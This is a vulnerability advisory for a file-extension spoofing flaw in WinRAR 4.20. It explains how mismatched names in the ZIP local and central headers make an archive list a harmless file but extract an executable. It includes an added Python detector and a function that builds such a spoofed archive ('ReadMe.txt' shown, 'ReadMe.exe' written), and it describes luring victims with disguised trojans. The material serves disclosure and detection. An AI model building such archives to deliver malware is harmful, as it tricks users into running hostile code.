WinRar 4.20 - File Extension Spoofing (0Day)

# Exploit Title: WinRar File extension spoofing (0Day)

# Date: 23/03/14
# Exploit Author: Danor Cohen (An7i)  (http://an7isec.blogspot.co.il/) (https://twitter.com/An7i21)
# Vendor Homepage: http://www.rarlab.com/
# Version: [4.20]
# Tested on: [Windows 8 ,Windows 7 ,Windows xp]
-------------------------------------------------------------------------------------------------

WinRar File extension spoofing ( 0DAY )

WinRAR is one of the most common applications for compressing and decompressing data.

The application is capable of compressing data in either the RAR or the ZIP format.

This article presents a new vulnerability that I found in WinRAR version 4.20
(other versions may be vulnerable too).

Here is a quick brief of the ZIP file format (the local file header that precedes each stored file):

Offset  Bytes  Description
00      4      Local file header signature = 0x04034b50 (read as a little-endian number)
04      2      Version needed to extract (minimum)
06      2      General purpose bit flag
08      2      Compression method
10      2      File last modification time
12      2      File last modification date
14      4      CRC-32
18      4      Compressed size
22      4      Uncompressed size
26      2      File name length (n)
28      2      Extra field length (m)
30      n      File name
30+n    m      Extra field

(the information is taken from Wikipedia - http://en.wikipedia.org/wiki/Zip_(file_format) )

---------------------------------------------------------------------------------------------------


So from the file format description we can see that the bytes starting at offset 30 hold
the file name of the compressed file.

When we compress a file in "ZIP format" with WinRAR, the file structure looks the same,
but WinRAR adds several properties of its own.

The file name also appears a second time, further into the archive. (This second copy is the
entry's central directory header, signature 0x02014b50, which every ZIP writer emits near the end
of the file; the ZIP format itself does not force the two copies to match, and that is what
matters here.)

Further analysis reveals that the second name is the "File Name" that WinRAR gives to the
extracted output file, while the first name is the name that appears in the WinRAR GUI window.
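The following is an added example, not code from the advisory or from the author's PoC. It parses the two places a ZIP stores each file name, the local file header (offsets from the table above) and the central directory header (layout taken from the ZIP specification, not shown on this page), and reports every entry whose two names differ, which is exactly the condition the spoof relies on. To give the check something to run on, make_spoofed_zip() builds a constructed one-entry archive with mismatched names; it assigns the displayed name to the first (local) copy and the extracted name to the second (central directory) copy, following the author's description of which copy WinRAR 4.20 uses for what. All names, payloads and function names are illustrative.

```python
import io
import struct
import zipfile

# Signatures from the ZIP specification, written as they appear on disk
# (0x04034b50, 0x02014b50 and 0x06054b50 read as little-endian numbers).
LOCAL_SIG = b"PK\x03\x04"    # local file header
CENTRAL_SIG = b"PK\x01\x02"  # central directory file header
EOCD_SIG = b"PK\x05\x06"     # end of central directory record


def central_entries(data):
    """Yield (name, local_header_offset) for every central directory entry.

    Central directory header layout (fixed part is 46 bytes): name length at
    +28, extra length at +30, comment length at +32, offset of the matching
    local file header at +42, then the name itself at +46.
    """
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD: total entries at +10 (2 bytes), directory size at +12, directory offset at +16
    total, cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    pos = cd_offset
    for _ in range(total):
        if data[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("bad central directory signature at offset %d" % pos)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        local_off, = struct.unpack_from("<I", data, pos + 42)
        name = data[pos + 46:pos + 46 + name_len]
        yield name.decode("utf-8", "replace"), local_off
        pos += 46 + name_len + extra_len + comment_len


def local_name(data, offset):
    """Return the file name stored in the local file header at `offset`
    (table above: name length at +26, name bytes at +30)."""
    if data[offset:offset + 4] != LOCAL_SIG:
        raise ValueError("bad local file header signature at offset %d" % offset)
    name_len, = struct.unpack_from("<H", data, offset + 26)
    return data[offset + 30:offset + 30 + name_len].decode("utf-8", "replace")


def find_name_mismatches(data):
    """Return [(central_name, local_name), ...] for every entry whose two
    stored names differ.  An empty list means the archive is consistent."""
    mismatches = []
    for cname, loff in central_entries(data):
        lname = local_name(data, loff)
        if cname != lname:
            mismatches.append((cname, lname))
    return mismatches


def make_spoofed_zip(shown_name, real_name, payload):
    """Constructed sample (not the author's PoC): a one-entry archive whose
    local file header says `shown_name` while the central directory says
    `real_name`.  Per the author's description, WinRAR 4.20 displays the
    first copy and writes the extracted file under the second."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(shown_name, payload)
    data = bytearray(buf.getvalue())

    eocd = data.rfind(EOCD_SIG)
    cd_size, cd_offset = struct.unpack_from("<II", data, eocd + 12)
    old, new = shown_name.encode("utf-8"), real_name.encode("utf-8")
    name_pos = cd_offset + 46                     # single entry: first central header
    assert data[name_pos:name_pos + len(old)] == old
    data[name_pos:name_pos + len(old)] = new      # may change the overall length
    struct.pack_into("<H", data, cd_offset + 28, len(new))
    eocd = data.rfind(EOCD_SIG)                   # EOCD moved if the length changed
    struct.pack_into("<I", data, eocd + 12, cd_size - len(old) + len(new))
    return bytes(data)


if __name__ == "__main__":
    # Constructed payload: an arbitrary blob standing in for a dropped executable.
    sample = make_spoofed_zip("ReadMe.txt", "ReadMe.exe", b"MZ not really a PE")
    print(find_name_mismatches(sample))   # [('ReadMe.exe', 'ReadMe.txt')]
```

Run find_name_mismatches() over any archive you are about to open in a vulnerable extractor; a non-empty result is the signature of this trick, whatever the names are. Python's own zipfile module refuses to open an entry whose two names differ (BadZipFile, "File name in directory ... and header ... differ"), which is the behaviour an archiver should have: either reject the archive or use the same copy of the name for both listing and extraction.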



This behavior can easily be turned into a very dangerous security hole: the archive lists a
harmless-looking name while the file actually written to disk carries an executable extension.

Think about an attacker who publishes some informative "txt" file called "ReadMe.txt", or even
a PDF like "VirusTotal_ScanResults.pdf", or a more tempting file like "My Girl Friend new bathing suit.jpg".

Think about an innocent user who opens that file and, instead of getting a readme file, a PDF book
or an interesting image, gets a nasty Trojan horse...


The POC can be found in the original post on my blog:

http://an7isec.blogspot.co.il/2014/03/winrar-file-extension-spoofing-0day.html